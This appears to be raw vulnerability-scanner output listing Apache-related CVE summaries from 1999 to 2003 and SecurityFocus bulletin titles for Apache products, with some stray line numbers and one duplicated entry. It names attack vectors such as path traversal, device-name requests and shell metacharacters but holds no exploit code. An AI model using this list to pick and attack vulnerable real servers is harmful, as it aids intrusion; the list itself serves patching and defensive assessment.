| [CVE-2003-0192] Apache 2 before 2.0.47, and certain versions of mod_ssl for Apache 1.3, do not properly handle "certain sequences of per-directory renegotiations and the SSLCipherSuite directive being used to upgrade from a weak ciphersuite to a strong one," which could cause Apache to use the weak ciphersuite.
| [CVE-2003-0189] The authentication module for Apache 2.0.40 through 2.0.45 on Unix does not properly handle threads safely when using the crypt_r or crypt functions, which allows remote attackers to cause a denial of service (failed Basic authentication with valid usernames and passwords) when a threaded MPM is used.
| [CVE-2003-0134] Unknown vulnerability in filestat.c for Apache running on OS2, versions 2.0 through 2.0.45, allows unknown attackers to cause a denial of service via requests related to device names.
| [CVE-2003-0132] A memory leak in Apache 2.0 through 2.0.44 allows remote attackers to cause a denial of service (memory consumption) via large chunks of linefeed characters, which causes Apache to allocate 80 bytes for each linefeed.
| [CVE-2003-0083] Apache 1.3 before 1.3.25 and Apache 2.0 before version 2.0.46 does not filter terminal escape sequences from its access logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences, a different vulnerability than CVE-2003-0020.
| [CVE-2003-0020] Apache does not filter terminal escape sequences from its error logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences.
| [CVE-2003-0017] Apache 2.0 before 2.0.44 on Windows platforms allows remote attackers to obtain certain files via an HTTP request that ends in certain illegal characters such as ">", which causes a different filename to be processed and served.
| [CVE-2003-0016] Apache before 2.0.44, when running on unpatched Windows 9x and Me operating systems, allows remote attackers to cause a denial of service or execute arbitrary code via an HTTP request containing MS-DOS device names.
| [CVE-2002-2310] ClickCartPro 4.0 stores the admin_user.db data file under the web document root with insufficient access control on servers other than Apache, which allows remote attackers to obtain usernames and passwords.
| [CVE-2002-2309] php.exe in PHP 3.0 through 4.2.2, when running on Apache, does not terminate properly, which allows remote attackers to cause a denial of service via a direct request without arguments.
| [CVE-2002-2272] Tomcat 4.0 through 4.1.12, using mod_jk 1.2.1 module on Apache 1.3 through 1.3.27, allows remote attackers to cause a denial of service (desynchronized communications) via an HTTP GET request with a Transfer-Encoding chunked field with invalid values.
| [CVE-2002-2103] Apache before 1.3.24, when writing to the log file, records a spoofed hostname from the reverse lookup of an IP address, even when a double-reverse lookup fails, which allows remote attackers to hide the original source of activities.
| [CVE-2002-2029] PHP, when installed on Windows with Apache and ScriptAlias for /php/ set to c:/php/, allows remote attackers to read arbitrary files and possibly execute arbitrary programs via an HTTP request for php.exe with a filename in the query string.
| [CVE-2002-2012] Unknown vulnerability in Apache 1.3.19 running on HP Secure OS for Linux 1.0 allows remote attackers to cause "unexpected results" via an HTTP request.
| [CVE-2002-2009] Apache Tomcat 4.0.1 allows remote attackers to obtain the web root path via HTTP requests for JSP files preceded by (1) +/, (2) >/, (3) </, and (4) %20/, which leaks the pathname in an error message.
| [CVE-2002-2008] Apache Tomcat 4.0.3 for Windows allows remote attackers to obtain the web root path via an HTTP request for a resource that does not exist, such as lpt9, which leaks the information in an error message.
| [CVE-2002-2007] The default installations of Apache Tomcat 3.2.3 and 3.2.4 allows remote attackers to obtain sensitive system information such as directory listings and web root path, via erroneous HTTP requests for Java Server Pages (JSP) in the (1) test/jsp, (2) samples/jsp and (3) examples/jsp directories, or the (4) test/realPath.jsp servlet, which leaks pathnames in error messages.
| [CVE-2002-2006] The default installation of Apache Tomcat 4.0 through 4.1 and 3.0 through 3.3.1 allows remote attackers to obtain the installation path and other sensitive system information via the (1) SnoopServlet or (2) TroubleShooter example servlets.
| [CVE-2002-1895] The servlet engine in Jakarta Apache Tomcat 3.3 and 4.0.4, when using IIS and the ajp1.3 connector, allows remote attackers to cause a denial of service (crash) via a large number of HTTP GET requests for an MS-DOS device such as AUX, LPT1, CON, or PRN.
| [CVE-2002-1850] mod_cgi in Apache 2.0.39 and 2.0.40 allows local users and possibly remote attackers to cause a denial of service (hang and memory consumption) by causing a CGI script to send a large amount of data to stderr, which results in a read/write deadlock between httpd and the CGI script.
| [CVE-2002-1793] HTTP Server mod_ssl module running on HP-UX 11.04 with Virtualvault OS (VVOS) 4.5 through 4.6 closes the connection when the Apache server times out during an SSL request, which may allow attackers to cause a denial of service.
| [CVE-2002-1658] Buffer overflow in htdigest in Apache 1.3.26 and 1.3.27 may allow attackers to execute arbitrary code via a long user argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.
| [CVE-2002-1635] The Apache configuration file (httpd.conf) in Oracle 9i Application Server (9iAS) uses a Location alias for /perl directory instead of a ScriptAlias, which allows remote attackers to read the source code of arbitrary CGI files via a URL containing the /perl directory instead of /cgi-bin.
| [CVE-2002-1593] mod_dav in Apache before 2.0.42 does not properly handle versioning hooks, which may allow remote attackers to kill a child process via a null dereference and cause a denial of service (CPU consumption) in a preforked multi-processing module.
| [CVE-2002-1592] The ap_log_rerror function in Apache 2.0 through 2.035, when a CGI application encounters an error, sends error messages to the client that include the full path for the server, which allows remote attackers to obtain sensitive information.
| [CVE-2002-1567] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1 allows remote attackers to execute arbitrary web script and steal cookies via a URL with encoded newlines followed by a request to a .jsp file whose name contains the script.
| [CVE-2002-1394] Apache Tomcat 4.0.5 and earlier, when using both the invoker servlet and the default servlet, allows remote attackers to read source code for server files or bypass certain protections, a variant of CAN-2002-1148.
| [CVE-2002-1233] A regression error in the Debian distributions of the apache-ssl package (before 1.3.9 on Debian 2.2, and before 1.3.26 on Debian 3.0), for Apache 1.3.27 and earlier, allows local users to read or modify the Apache password file via a symlink attack on temporary files when the administrator runs (1) htpasswd or (2) htdigest, a re-introduction of a vulnerability that was originally identified and addressed by CVE-2001-0131.
| [CVE-2002-1157] Cross-site scripting vulnerability in the mod_ssl Apache module 2.8.9 and earlier, when UseCanonicalName is off and wildcard DNS is enabled, allows remote attackers to execute script as other web site visitors, via the server name in an HTTPS response on the SSL port, which is used in a self-referencing URL, a different vulnerability than CAN-2002-0840.
| [CVE-2002-1156] Apache 2.0.42 allows remote attackers to view the source code of a CGI script via a POST request to a directory with both WebDAV and CGI enabled.
| [CVE-2002-1148] The default servlet (org.apache.catalina.servlets.DefaultServlet) in Tomcat 4.0.4 and 4.1.10 and earlier allows remote attackers to read source code for server files via a direct request to the servlet.
| [CVE-2002-0935] Apache Tomcat 4.0.3, and possibly other versions before 4.1.3 beta, allows remote attackers to cause a denial of service (resource exhaustion) via a large number of requests to the server with null characters, which causes the working threads to hang.
| [CVE-2002-0843] Buffer overflows in the ApacheBench benchmark support program (ab.c) in Apache before 1.3.27, and Apache 2.x before 2.0.43, allow a malicious web server to cause a denial of service and possibly execute arbitrary code via a long response.
| [CVE-2002-0840] Cross-site scripting (XSS) vulnerability in the default error page of Apache 2.0 before 2.0.43, and 1.3.x up to 1.3.26, when UseCanonicalName is "Off" and support for wildcard DNS is present, allows remote attackers to execute script as other web page visitors via the Host: header, a different vulnerability than CAN-2002-1157.
| [CVE-2002-0839] The shared memory scoreboard in the HTTP daemon for Apache 1.3.x before 1.3.27 allows any user running as the Apache UID to send a SIGUSR1 signal to any process as root, resulting in a denial of service (process kill) or possibly other behaviors that would not normally be allowed, by modifying the parent[].pid and parent[].last_rtime segments in the scoreboard.
| [CVE-2002-0682] Cross-site scripting vulnerability in Apache Tomcat 4.0.3 allows remote attackers to execute script as other web users via script in a URL with the /servlet/ mapping, which does not filter the script when an exception is thrown by the servlet.
| [CVE-2002-0661] Directory traversal vulnerability in Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to read arbitrary files and execute commands via .. (dot dot) sequences containing \ (backslash) characters.
| [CVE-2002-0658] OSSP mm library (libmm) before 1.2.0 allows the local Apache user to gain privileges via temporary files, possibly via a symbolic link attack.
| [CVE-2002-0654] Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to determine the full pathname of the server via (1) a request for a .var file, which leaks the pathname in the resulting error message, or (2) via an error message that occurs when a script (child process) cannot be invoked.
| [CVE-2002-0653] Off-by-one buffer overflow in the ssl_compat_directive function, as called by the rewrite_command hook for mod_ssl Apache module 2.8.9 and earlier, allows local users to execute arbitrary code as the Apache server user via .htaccess files with long entries.
| [CVE-2002-0513] The PHP administration script in popper_mod 1.2.1 and earlier relies on Apache .htaccess authentication, which allows remote attackers to gain privileges if the script is not appropriately configured by the administrator.
| [CVE-2002-0493] Apache Tomcat may be started without proper security settings if errors are encountered while reading the web.xml file, which could allow attackers to bypass intended restrictions.
| [CVE-2002-0392] Apache 1.3 through 1.3.24, and Apache 2.0 through 2.0.36, allows remote attackers to cause a denial of service and possibly execute arbitrary code via a chunk-encoded HTTP request that causes Apache to use an incorrect size.
| [CVE-2002-0259] InstantServers MiniPortal 1.1.5 and earlier stores sensitive login and account data in plaintext in (1) .pwd files in the miniportal/apache directory, or (2) mplog.txt, which could allow local users to gain privileges.
| [CVE-2002-0249] PHP for Windows, when installed on Apache 2.0.28 beta as a standalone CGI module, allows remote attackers to obtain the physical path of the php.exe via a request with malformed arguments such as /123, which leaks the pathname in the error message.
| [CVE-2002-0240] PHP, when installed with Apache and configured to search for index.php as a default web page, allows remote attackers to obtain the full pathname of the server via the HTTP OPTIONS method, which reveals the pathname in the resulting error message.
| [CVE-2002-0082] The dbm and shm session cache code in mod_ssl before 2.8.7-1.3.23, and Apache-SSL before 1.3.22+1.46, does not properly initialize memory using the i2d_SSL_SESSION function, which allows remote attackers to use a buffer overflow to execute arbitrary code via a large client certificate that is signed by a trusted Certificate Authority (CA), which produces a large serialized session.
| [CVE-2002-0061] Apache for Win32 before 1.3.24, and 2.0.x before 2.0.34-beta, allows remote attackers to execute arbitrary commands via shell metacharacters (a | pipe character) provided as arguments to batch (.bat) or .cmd scripts, which are sent unfiltered to the shell interpreter, typically cmd.exe.
| [CVE-2001-1556] The log files in Apache web server contain information directly supplied by clients and does not filter or quote control characters, which could allow remote attackers to hide HTTP requests and spoof source IP addresses when logs are viewed with UNIX programs such as cat, tail, and grep.
| [CVE-2001-1534] mod_usertrack in Apache 1.3.11 through 1.3.20 generates session ID's using predictable information including host IP address, system time and server process ID, which allows local users to obtain session ID's and bypass authentication when these session ID's are used for authentication.
| [CVE-2001-1510] Allaire JRun 2.3.3, 3.0 and 3.1 running on IIS 4.0 and 5.0, iPlanet, Apache, JRun web server (JWS), and possibly other web servers allows remote attackers to read arbitrary files and directories by appending (1) "%3f.jsp", (2) "?.jsp" or (3) "?" to the requested URL.
| [CVE-2001-1449] The default installation of Apache before 1.3.19 on Mandrake Linux 7.1 through 8.0 and Linux Corporate Server 1.0.1 allows remote attackers to list the directory index of arbitrary web directories.
| [CVE-2001-1385] The Apache module for PHP 4.0.0 through PHP 4.0.4, when disabled with the 'engine = off' option for a virtual host, may disable PHP for other virtual hosts, which could cause Apache to serve the source code of PHP scripts.
| [CVE-2001-1342] Apache before 1.3.20 on Windows and OS/2 systems allows remote attackers to cause a denial of service (GPF) via an HTTP request for a URI that contains a large number of / (slash) or other characters, which causes certain functions to dereference a null pointer.
| [CVE-2001-1217] Directory traversal vulnerability in PL/SQL Apache module in Oracle Oracle 9i Application Server allows remote attackers to access sensitive information via a double encoded URL with .. (dot dot) sequences.
| [CVE-2001-1216] Buffer overflow in PL/SQL Apache module in Oracle 9i Application Server allows remote attackers to execute arbitrary code via a long request for a help page.
| [CVE-2001-1072] Apache with mod_rewrite enabled on most UNIX systems allows remote attackers to bypass RewriteRules by inserting extra / (slash) characters into the requested path, which causes the regular expression in the RewriteRule to fail.
| [CVE-2001-1013] Apache on Red Hat Linux with with the UserDir directive enabled generates different error codes when a username exists and there is no public_html directory and when the username does not exist, which could allow remote attackers to determine valid usernames on the server.
| [CVE-2001-0925] The default installation of Apache before 1.3.19 allows remote attackers to list directories instead of the multiview index.html file via an HTTP request for a path that contains many / (slash) characters, which causes the path to be mishandled by (1) mod_negotiation, (2) mod_dir, or (3) mod_autoindex.
| [CVE-2001-0829] A cross-site scripting vulnerability in Apache Tomcat 3.2.1 allows a malicious webmaster to embed Javascript in a request for a .JSP file, which causes the Javascript to be inserted into an error message.
| [CVE-2001-0766] Apache on MacOS X Client 10.0.3 with the HFS+ file system allows remote attackers to bypass access restrictions via a URL that contains some characters whose case is not matched by Apache's filters.
| [CVE-2001-0731] Apache 1.3.20 with Multiviews enabled allows remote attackers to view directory contents and bypass the index page via a URL containing the "M=D" query string.
| [CVE-2001-0730] split-logfile in Apache 1.3.20 allows remote attackers to overwrite arbitrary files that end in the .log extension via an HTTP request with a / (slash) in the Host: header.
| [CVE-2001-0729] Apache 1.3.20 on Windows servers allows remote attackers to bypass the default index page and list directory contents via a URL with a large number of / (slash) characters.
| [CVE-2001-0590] Apache Software Foundation Tomcat Servlet prior to 3.2.2 allows a remote attacker to read the source code to arbitrary 'jsp' files via a malformed URL request which does not end with an HTTP protocol specification (i.e. HTTP/1.0).
| [CVE-2001-0131] htpasswd and htdigest in Apache 2.0a9, 1.3.14, and others allows local users to overwrite arbitrary files via a symlink attack.
| [CVE-2001-0108] PHP Apache module 4.0.4 and earlier allows remote attackers to bypass .htaccess access restrictions via a malformed HTTP request on an unrestricted page that causes PHP to use those access controls on the next page that is requested.
| [CVE-2001-0042] PHP 3.x (PHP3) on Apache 1.3.6 allows remote attackers to read arbitrary files via a modified .. (dot dot) attack containing "%5c" (encoded backslash) sequences.
| [CVE-2000-1247] The default configuration of the jserv-status handler in jserv.conf in Apache JServ 1.1.2 includes an "allow from 127.0.0.1" line, which allows local users to discover JDBC passwords or other sensitive information via a direct request to the jserv/ URI.
| [CVE-2000-1210] Directory traversal vulnerability in source.jsp of Apache Tomcat before 3.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the argument to source.jsp.
| [CVE-2000-1206] Vulnerability in Apache httpd before 1.3.11, when configured for mass virtual hosting using mod_rewrite, or mod_vhost_alias in Apache 1.3.9, allows remote attackers to retrieve arbitrary files.
6663| [CVE-2000-1206] Vulnerability in Apache httpd before 1.3.11, when configured for mass virtual hosting using mod_rewrite, or mod_vhost_alias in Apache 1.3.9, allows remote attackers to retrieve arbitrary files.
6664| [CVE-2000-1205] Cross site scripting vulnerabilities in Apache 1.3.0 through 1.3.11 allow remote attackers to execute script as other web site visitors via (1) the printenv CGI (printenv.pl), which does not encode its output, (2) pages generated by the ap_send_error_response function such as a default 404, which does not add an explicit charset, or (3) various messages that are generated by certain Apache modules or core code. NOTE: the printenv issue might still exist for web browsers that can render text/plain content types as HTML, such as Internet Explorer, but CVE regards this as a design limitation of those browsers, not Apache. The printenv.pl/acuparam vector, disclosed on 20070724, is one such variant.
6665| [CVE-2000-1204] Vulnerability in the mod_vhost_alias virtual hosting module for Apache 1.3.9, 1.3.11 and 1.3.12 allows remote attackers to obtain the source code for CGI programs if the cgi-bin directory is under the document root.
6666| [CVE-2000-1168] IBM HTTP Server 1.3.6 (based on Apache) allows remote attackers to cause a denial of service and possibly execute arbitrary commands via a long GET request.
6667| [CVE-2000-1016] The default configuration of Apache (httpd.conf) on SuSE 6.4 includes an alias for the /usr/doc directory, which allows remote attackers to read package documentation and obtain system configuration information via an HTTP request for the /doc/packages URL.
6668| [CVE-2000-0913] mod_rewrite in Apache 1.3.12 and earlier allows remote attackers to read arbitrary files if a RewriteRule directive is expanded to include a filename whose name contains a regular expression.
6669| [CVE-2000-0883] The default configuration of mod_perl for Apache as installed on Mandrake Linux 6.1 through 7.1 sets the /perl/ directory to be browseable, which allows remote attackers to list the contents of that directory.
6670| [CVE-2000-0869] The default configuration of Apache 1.3.12 in SuSE Linux 6.4 enables WebDAV, which allows remote attackers to list arbitrary directories via the PROPFIND HTTP request method.
6671| [CVE-2000-0868] The default configuration of Apache 1.3.12 in SuSE Linux 6.4 allows remote attackers to read source code for CGI scripts by replacing the /cgi-bin/ in the requested URL with /cgi-bin-sdb/.
6672| [CVE-2000-0791] Trustix installs the httpsd program for Apache-SSL with world-writeable permissions, which allows local users to replace it with a Trojan horse.
6673| [CVE-2000-0760] The Snoop servlet in Jakarta Tomcat 3.1 and 3.0 under Apache reveals sensitive system information when a remote attacker requests a nonexistent URL with a .snp extension.
6674| [CVE-2000-0759] Jakarta Tomcat 3.1 under Apache reveals physical path information when a remote attacker requests a URL that does not exist, which generates an error message that includes the physical path.
6675| [CVE-2000-0628] The source.asp example script in the Apache ASP module Apache::ASP 1.93 and earlier allows remote attackers to modify files.
6676| [CVE-2000-0505] The Apache 1.3.x HTTP server for Windows platforms allows remote attackers to list directory contents by requesting a URL containing a large number of / characters.
6677| [CVE-1999-1412] A possible interaction between Apple MacOS X release 1.0 and Apache HTTP server allows remote attackers to cause a denial of service (crash) via a flood of HTTP GET requests to CGI programs, which generates a large number of processes.
6678| [CVE-1999-1293] mod_proxy in Apache 1.2.5 and earlier allows remote attackers to cause a denial of service via malformed FTP commands, which causes Apache to dump core.
6679| [CVE-1999-1237] Multiple buffer overflows in smbvalid/smbval SMB authentication library, as used in Apache::AuthenSmb and possibly other modules, allows remote attackers to execute arbitrary commands via (1) a long username, (2) a long password, and (3) other unspecified methods.
6680| [CVE-1999-1199] Apache WWW server 1.3.1 and earlier allows remote attackers to cause a denial of service (resource exhaustion) via a large number of MIME headers with the same name, aka the "sioux" vulnerability.
6681| [CVE-1999-1053] guestbook.pl cleanses user-inserted SSI commands by removing text between "<!--" and "-->" separators, which allows remote attackers to execute arbitrary commands when guestbook.pl is run on Apache 1.3.9 and possibly other versions, since Apache allows other closing sequences besides "-->".
6682| [CVE-1999-0926] Apache allows remote attackers to conduct a denial of service via a large number of MIME headers.
6683| [CVE-1999-0678] A default configuration of Apache on Debian GNU/Linux sets the ServerRoot to /usr/doc, which allows remote users to read documentation files for the entire server.
6684| [CVE-1999-0448] IIS 4.0 and Apache log HTTP request methods, regardless of how long they are, allowing a remote attacker to hide the URL they really request.
6685| [CVE-1999-0289] The Apache web server for Win32 may provide access to restricted files when a . (dot) is appended to a requested URL.
6686| [CVE-1999-0236] ScriptAlias directory in NCSA and Apache httpd allowed attackers to read CGI programs.
6687| [CVE-1999-0107] Buffer overflow in Apache 1.2.5 and earlier allows a remote attacker to cause a denial of service with a large number of GET requests containing a large number of / characters.
6688| [CVE-1999-0071] Apache httpd cookie buffer overflow for versions 1.1.1 and earlier.
6689|
6690| SecurityFocus - https://www.securityfocus.com/bid/:
6691| [104554] Apache HBase CVE-2018-8025 Security Bypass Vulnerability
6692| [104465] Apache Geode CVE-2017-15695 Remote Code Execution Vulnerability
6693| [104418] Apache Storm CVE-2018-8008 Arbitrary File Write Vulnerability
6694| [104399] Apache Storm CVE-2018-1332 User Impersonation Vulnerability
6695| [104348] Apache UIMA CVE-2017-15691 XML External Entity Injection Vulnerability
6696| [104313] Apache NiFi XML External Entity Injection and Denial of Service Vulnerability
6697| [104259] Apache Geode CVE-2017-12622 Authorization Bypass Vulnerability
6698| [104257] Apache Sling XSS Protection API CVE-2017-15717 Cross Site Scripting Vulnerability
6699| [104253] Apache ZooKeeper CVE-2018-8012 Security Bypass Vulnerability
6700| [104252] Apache Batik CVE-2018-8013 Information Disclosure Vulnerability
6701| [104239] Apache Solr CVE-2018-8010 XML External Entity Multiple Information Disclosure Vulnerabilities
6702| [104215] Apache ORC CVE-2018-8015 Denial of Service Vulnerability
6703| [104203] Apache Tomcat CVE-2018-8014 Security Bypass Vulnerability
6704| [104161] Apache Ambari CVE-2018-8003 Directory Traversal Vulnerability
6705| [104140] Apache Derby CVE-2018-1313 Security Bypass Vulnerability
6706| [104135] Apache Tika CVE-2018-1338 Denial of Service Vulnerability
6707| [104008] Apache Fineract CVE-2018-1291 SQL Injection Vulnerability
6708| [104007] Apache Fineract CVE-2018-1292 SQL Injection Vulnerability
6709| [104005] Apache Fineract CVE-2018-1289 SQL Injection Vulnerability
6710| [104001] Apache Tika CVE-2018-1335 Remote Command Injection Vulnerability
6711| [103975] Apache Fineract CVE-2018-1290 SQL Injection Vulnerability
6712| [103974] Apache Solr CVE-2018-1308 XML External Entity Injection Vulnerability
6713| [103772] Apache Traffic Server CVE-2017-7671 Denial of Service Vulnerability
6714| [103770] Apache Traffic Server CVE-2017-5660 Security Bypass Vulnerability
6715| [103751] Apache Hive CVE-2018-1282 SQL Injection Vulnerability
6716| [103750] Apache Hive CVE-2018-1284 Security Bypass Vulnerability
6717| [103692] Apache Ignite CVE-2018-1295 Arbitrary Code Execution Vulnerability
6718| [103528] Apache HTTP Server CVE-2018-1302 Denial of Service Vulnerability
6719| [103525] Apache HTTP Server CVE-2017-15715 Remote Security Bypass Vulnerability
6720| [103524] Apache HTTP Server CVE-2018-1312 Remote Security Bypass Vulnerability
6721| [103522] Apache HTTP Server CVE-2018-1303 Denial of Service Vulnerability
6722| [103520] Apache HTTP Server CVE-2018-1283 Remote Security Vulnerability
6723| [103516] Apache Struts CVE-2018-1327 Denial of Service Vulnerability
6724| [103515] Apache HTTP Server CVE-2018-1301 Denial of Service Vulnerability
6725| [103512] Apache HTTP Server CVE-2017-15710 Denial of Service Vulnerability
6726| [103508] Apache Syncope CVE-2018-1321 Multiple Remote Code Execution Vulnerabilities
6727| [103507] Apache Syncope CVE-2018-1322 Multiple Information Disclosure Vulnerabilities
6728| [103490] Apache Commons Compress CVE-2018-1324 Multiple Denial Of Service Vulnerabilities
6729| [103434] APACHE Allura CVE-2018-1319 HTTP Response Splitting Vulnerability
6730| [103389] Apache Tomcat JK Connector CVE-2018-1323 Directory Traversal Vulnerability
6731| [103222] Apache CloudStack CVE-2013-4317 Information Disclosure Vulnerability
6732| [103219] Apache Xerces-C CVE-2017-12627 Null Pointer Dereference Denial of Service Vulnerability
6733| [103206] Apache Geode CVE-2017-15693 Remote Code Execution Vulnerability
6734| [103205] Apache Geode CVE-2017-15692 Remote Code Execution Vulnerability
6735| [103170] Apache Tomcat CVE-2018-1304 Security Bypass Vulnerability
6736| [103144] Apache Tomcat CVE-2018-1305 Security Bypass Vulnerability
6737| [103102] Apache Oozie CVE-2017-15712 Information Disclosure Vulnerability
6738| [103098] Apache Karaf CVE-2016-8750 LDAP Injection Vulnerability
6739| [103069] Apache Tomcat CVE-2017-15706 Remote Security Weakness
6740| [103068] Apache JMeter CVE-2018-1287 Security Bypass Vulnerability
6741| [103067] Apache Qpid Dispatch Router 'router_core/connections.c' Denial of Service Vulnerability
6742| [103036] Apache CouchDB CVE-2017-12636 Remote Code Execution Vulnerability
6743| [103025] Apache Thrift CVE-2016-5397 Remote Command Injection Vulnerability
6744| [102879] Apache POI CVE-2017-12626 Multiple Denial of Service Vulnerabilities
6745| [102842] Apache NiFi CVE-2017-12632 Host Header Injection Vulnerability
6746| [102815] Apache NiFi CVE-2017-15697 Multiple Cross Site Scripting Vulnerabilities
6747| [102488] Apache Geode CVE-2017-9795 Remote Code Execution Vulnerability
6748| [102229] Apache Sling CVE-2017-15700 Information Disclosure Vulnerability
6749| [102226] Apache Drill CVE-2017-12630 Cross Site Scripting Vulnerability
6750| [102154] Multiple Apache Products CVE-2017-15708 Remote Code Execution Vulnerability
6751| [102127] Apache CXF Fediz CVE-2017-12631 Multiple Cross Site Request Forgery Vulnerabilities
6752| [102041] Apache Qpid Broker-J CVE-2017-15701 Denial of Service Vulnerability
6753| [102040] Apache Qpid Broker CVE-2017-15702 Security Weakness
6754| [102021] Apache Struts CVE-2017-15707 Denial of Service Vulnerability
6755| [101980] EMC RSA Authentication Agent for Web: Apache Web Server Authentication Bypass Vulnerability
6756| [101876] Apache Camel CVE-2017-12634 Deserialization Remote Code Execution Vulnerability
6757| [101874] Apache Camel CVE-2017-12633 Deserialization Remote Code Execution Vulnerability
6758| [101872] Apache Karaf CVE-2014-0219 Local Denial of Service Vulnerability
6759| [101868] Apache CouchDB CVE-2017-12635 Remote Privilege Escalation Vulnerability
6760| [101859] Apache CXF CVE-2017-12624 Denial of Service Vulnerability
6761| [101844] Apache Sling Servlets Post CVE-2017-11296 Cross Site Scripting Vulnerability
6762| [101686] Apache Hive CVE-2017-12625 Information Disclosure Vulnerability
6763| [101644] Apache Wicket CVE-2012-5636 Cross Site Scripting Vulnerability
6764| [101631] Apache Traffic Server CVE-2015-3249 Multiple Remote Code Execution Vulnerabilities
6765| [101630] Apache Traffic Server CVE-2014-3624 Access Bypass Vulnerability
6766| [101625] Apache jUDDI CVE-2009-1197 Security Bypass Vulnerability
6767| [101623] Apache jUDDI CVE-2009-1198 Cross Site Scripting Vulnerability
6768| [101620] Apache Subversion 'libsvn_fs_fs/fs_fs.c' Denial of Service Vulnerability
6769| [101585] Apache OpenOffice Multiple Remote Code Execution Vulnerabilities
6770| [101577] Apache Wicket CVE-2016-6806 Cross Site Request Forgery Vulnerability
6771| [101575] Apache Wicket CVE-2014-0043 Information Disclosure Vulnerability
6772| [101570] Apache Geode CVE-2017-9797 Information Disclosure Vulnerability
6773| [101562] Apache Derby CVE-2010-2232 Arbitrary File Overwrite Vulnerability
6774| [101560] Apache Portable Runtime Utility CVE-2017-12613 Multiple Information Disclosure Vulnerabilities
6775| [101558] Apache Portable Runtime Utility Local Out-of-Bounds Read Denial of Service Vulnerability
6776| [101532] Apache James CVE-2017-12628 Arbitrary Command Execution Vulnerability
6777| [101516] Apache HTTP Server CVE-2017-12171 Security Bypass Vulnerability
6778| [101261] Apache Solr/Lucene CVE-2017-12629 Information Disclosure and Remote Code Execution Vulnerabilities
6779| [101230] Apache Roller CVE-2014-0030 XML External Entity Injection Vulnerability
6780| [101173] Apache IMPALA CVE-2017-9792 Information Disclosure Vulnerability
6781| [101052] Apache Commons Jelly CVE-2017-12621 Security Bypass Vulnerability
6782| [101027] Apache Mesos CVE-2017-7687 Denial of Service Vulnerability
6783| [101023] Apache Mesos CVE-2017-9790 Denial of Service Vulnerability
6784| [100954] Apache Tomcat CVE-2017-12617 Incomplete Fix Remote Code Execution Vulnerability
6785| [100946] Apache Wicket CVE-2014-7808 Cross Site Request Forgery Vulnerability
6786| [100901] Apache Tomcat CVE-2017-12615 Remote Code Execution Vulnerability
6787| [100897] Apache Tomcat CVE-2017-12616 Information Disclosure Vulnerability
6788| [100880] Apache Directory LDAP API CVE-2015-3250 Unspecified Information Disclosure Vulnerability
6789| [100872] Apache HTTP Server CVE-2017-9798 Information Disclosure Vulnerability
6790| [100870] Apache Solr CVE-2017-9803 Remote Privilege Escalation Vulnerability
6791| [100859] puppetlabs-apache CVE-2017-2299 Information Disclosure Vulnerability
6792| [100829] Apache Struts CVE-2017-12611 Remote Code Execution Vulnerability
6793| [100823] Apache Spark CVE-2017-12612 Deserialization Remote Code Execution Vulnerability
6794| [100612] Apache Struts CVE-2017-9804 Incomplete Fix Denial of Service Vulnerability
6795| [100611] Apache Struts CVE-2017-9793 Denial of Service Vulnerability
6796| [100609] Apache Struts CVE-2017-9805 Remote Code Execution Vulnerability
6797| [100587] Apache Atlas CVE-2017-3155 Cross Frame Scripting Vulnerability
6798| [100581] Apache Atlas CVE-2017-3154 Information Disclosure Vulnerability
6799| [100578] Apache Atlas CVE-2017-3153 Cross Site Scripting Vulnerability
6800| [100577] Apache Atlas CVE-2017-3152 Cross Site Scripting Vulnerability
6801| [100547] Apache Atlas CVE-2017-3151 HTML Injection Vulnerability
6802| [100536] Apache Atlas CVE-2017-3150 Cross Site Scripting Vulnerability
6803| [100449] Apache Pony Mail CVE-2016-4460 Authentication Bypass Vulnerability
6804| [100447] Apache2Triad Multiple Security Vulnerabilities
6805| [100284] Apache Sling Servlets Post CVE-2017-9802 Cross Site Scripting Vulnerability
6806| [100280] Apache Tomcat CVE-2017-7674 Security Bypass Vulnerability
6807| [100259] Apache Subversion CVE-2017-9800 Remote Command Execution Vulnerability
6808| [100256] Apache Tomcat CVE-2017-7675 Directory Traversal Vulnerability
6809| [100235] Apache Storm CVE-2017-9799 Remote Code Execution Vulnerability
6810| [100082] Apache Commons Email CVE-2017-9801 SMTP Header Injection Vulnerability
6811| [99873] Apache Sling XSS Protection API CVE-2016-6798 XML External Entity Injection Vulnerability
6812| [99870] Apache Sling API CVE-2016-5394 Cross Site Scripting Vulnerability
6813| [99603] Apache Spark CVE-2017-7678 Cross Site Scripting Vulnerability
6814| [99592] Apache OpenMeetings CVE-2017-7685 Security Bypass Vulnerability
6815| [99587] Apache OpenMeetings CVE-2017-7673 Security Bypass Vulnerability
6816| [99586] Apache OpenMeetings CVE-2017-7688 Security Bypass Vulnerability
6817| [99584] Apache OpenMeetings CVE-2017-7684 Denial of Service Vulnerability
6818| [99577] Apache OpenMeetings CVE-2017-7663 Cross Site Scripting Vulnerability
6819| [99576] Apache OpenMeetings CVE-2017-7664 XML External Entity Injection Vulnerability
6820| [99569] Apache HTTP Server CVE-2017-9788 Memory Corruption Vulnerability
6821| [99568] Apache HTTP Server CVE-2017-9789 Denial of Service Vulnerability
6822| [99563] Apache Struts CVE-2017-7672 Denial of Service Vulnerability
6823| [99562] Apache Struts Spring AOP Functionality Denial of Service Vulnerability
6824| [99509] Apache Impala CVE-2017-5652 Information Disclosure Vulnerability
6825| [99508] Apache IMPALA CVE-2017-5640 Authentication Bypass Vulnerability
6826| [99486] Apache Traffic Control CVE-2017-7670 Denial of Service Vulnerability
6827| [99485] Apache Solr CVE-2017-7660 Security Bypass Vulnerability
6828| [99484] Apache Struts CVE-2017-9791 Remote Code Execution Vulnerability
6829| [99292] Apache Ignite CVE-2017-7686 Information Disclosure Vulnerability
6830| [99170] Apache HTTP Server CVE-2017-7679 Buffer Overflow Vulnerability
6831| [99137] Apache HTTP Server CVE-2017-7668 Denial of Service Vulnerability
6832| [99135] Apache HTTP Server CVE-2017-3167 Authentication Bypass Vulnerability
6833| [99134] Apache HTTP Server CVE-2017-3169 Denial of Service Vulnerability
